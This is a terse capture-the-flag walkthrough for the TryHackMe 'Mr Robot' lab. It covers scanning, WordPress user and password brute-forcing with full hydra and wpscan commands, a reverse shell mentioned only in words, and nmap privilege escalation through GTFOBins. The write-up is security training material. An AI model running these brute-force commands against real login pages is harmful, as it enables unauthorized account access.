CTF Mr Robot

nmap

Closed but it’s ok, THM take lot of time to load

Gobuster

wordpress login
http://10.10.185.72/wp-login.php

robots.txt

So…

Wordpress

Find the user

1
hydra -L fsocity.dic -p admin 10.10.185.72 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.185.72%2Fwp-admin%2F&testcookie=1:F=Invalid username." 

Find the password

1
wpscan -v -U user.txt -P fsocity.dic.sort --url http://10.10.185.72/wp-login.php

Revershell

zip it, send it, listen and activate.

Robot

md5

root

lse.sh

lse.sh is in my current directory.

/usr/local/bin/nmap

nmap exploit

https://gtfobins.github.io/gtfobins/nmap/